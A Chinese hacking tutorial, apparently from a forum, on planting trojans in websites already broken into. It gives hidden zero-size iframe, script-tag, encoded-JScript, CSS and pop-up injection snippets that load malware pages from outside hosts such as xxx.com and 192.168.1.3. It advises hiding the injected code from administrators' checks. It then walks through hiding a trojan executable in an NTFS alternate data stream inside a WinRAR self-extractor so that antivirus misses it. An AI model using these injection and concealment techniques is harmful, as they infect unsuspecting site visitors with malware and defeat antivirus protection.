一、最简单的也是最有效的
<iframe. src=http://www.xxx.com/muma.html width=0 height=0></iframe>
二、js挂马
<script. src=http://www.xxx.com/muma.js></script>
三、js变形加密
<SCRIPT. language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀的。
四、不是嵌入了与iframe不同
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe. src="http://www.xxx.com/muma.htm/"></iframe>';
五、css中挂马
body {
background-image: url('javascript.:document.write("<script. src=http://www.XXX.net/muma.js></script>")')}
题目:如何挂马 答:跟我来!
方法一:
一般在你
入侵了一个站拿到了webshell的时候。最常见的 挂站代码如下 :
<html>
<iframe. src="http://192.168.1.3/inc/joke.htm" width="0" height="0" frameborder="0"></iframe>
</html>
把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>
http://192.168.1.3/inc/joke.htm。而_blank>
http://192.168.1.3/inc/joke.htm也就是我门的网页
木马了,那width="0" height="0"又是什么意思呢?width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。
方法二:
<SCRIPT. language=javascript>
window.open("http://192.168.1.3/inc/joke.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后,放弃了检查这个页面,那你不是拣了大便宜了!这里我把width和height的值设置为1了,不错!就是1,因为我在用0测试了N次后,发现打开页面弹出我们的木马页是满屏显示的
其实我们还可以简单装饰一下那个页面的,让弹出一个我们伪造的广告,达到欺骗的效果!至于怎么伪装就看你
自己发挥了。还有几种方法在这里就不一一列举了,flash木马也很厉害的哦。
方法三:
还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script. language=javascript. src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)
document.write("<iframe. height=0 width=0 src='http://192.168.1.3/inc/joke.htm' name=hiddenframe></iframe>")
此招相当隐蔽.......实战就不用说了..............
方法四:
代码加进包含文件<!--#include file="conn.asp"-->
NTFS文件流与RAR联手打造免杀木马
也许从标题就可知道本文的大概意思了,不错!今天我要讲的就是NTFS文件流如何与WINRAR联手“加壳”木马。
小知识:流(STREAM)是NTFS下的概念,目前只有NTFS支持流。流依附于文件而存在,可以在流中存储2进制数据,文字或者其它一些东西。每个文件可以含有多个流,当流所依附的文件被删除,流也随之消失。流的名字和文件名以“:”分隔,例如:ABC:A.ABC就是文件名,而流的名字为“A.”,当我们操作流时,可以用如下的简单方法:
ECHO STREAM1>ABC:STREAM1
ECHO STREAM2>ABC:STREAM2
现在,ABC就有了“:STREAM1”和“:STREAM2”共2个流,而读出流可以用:
MORE MORE
废话不多说,我先介绍一下本文使用的工具:为了方便写文件流而编写的VBS脚本(Together.vbs),它可以把一个文件随意附在你想附的文件中,意思就是我们可以把我们的木马文件放到一个不起眼的文件中。
首先如何用工具生成一个附在文件夹的文件流,也就是流文件名为“:*”的形式呢?先建个空的文件夹,如“muma”,之后在文件夹的同一目录上运行“together.vbs”,填写方法如图1所示:
首先要填的就是你想打造的木马(由于我手头没有什么木马,只好找“webdav.exe”当木马了,注意KV是要杀Webdav.exe的哦)。要注意的是木马的位置要和“together.vbs”同一目录,不然会出现找不到文件的提示,接着就要填的就是你想把你的木马依随在那个文件或文件夹(最好是文件夹)。如果是文件夹的就应这样填:例如是附在“muma”(刚才第一步建的文件夹)这个文件夹上的,就写“muma”。填写完后按“确定”生成,将提示成功。
好了,NTFS文件就生成了。难道这就是我们最后的结果吗?这和黑防原来介绍的NTFS数据流木马是同样的道理,只不过是用脚本实现的而已,没有什么新意嘛!别忘了文章标题,我们还有RAR没有使用哦!
蝴蝶:是不是觉得有点意外?天天与WINRAR打交道居然不知道它有这个功能。或许每个Windows的
漏洞也在天天和人打交道,又有几个人发现了它们呢?
下一步出动我们的主角“WINRAR”,对着我们刚才用VBS做出来的文件夹点击右键,选择“添加到压缩文件”。
之后选择“生成自解压包”再选择“高级”选项卡,来到刚才图4那里,按图4那样勾选“保存文件流数据”,然后来到“自解压选项”里“常规”选项。注意在“解压后运行”项目中根据先前做得木马来填,如“muma:webdav.Exe”。在这里我注重的是讲解如何联合WINRAR构造木马,其它参数可根据个人喜好来填写。
到这里,这个木马基本上已经弄好了,只差一步:生成自解压包,大家点点鼠标就能实现了。下面是我已生成的文件的运行状态。
是不是觉得有点怪怪的?“WebDavScan”这个程序运行了,在进程中却没有见到它的踪影,只有“muma”这个刚生成的自解包的进程,可能秘密就在里面。由于这个程序是被KV2004列为病毒的,我们现在来看看能不能查出来。
如果是用WINRAR打包的文件流,KV2004是查不出来的,至于内存里也没有发现什么异常,看来这种方法还行得通哦!不过本文的只适合于Windows 2000以上的NTFS文件分区格式。
好了,文件就简单的介绍到这里了,大家现在可以方便的打造自己的不被杀的木马了!
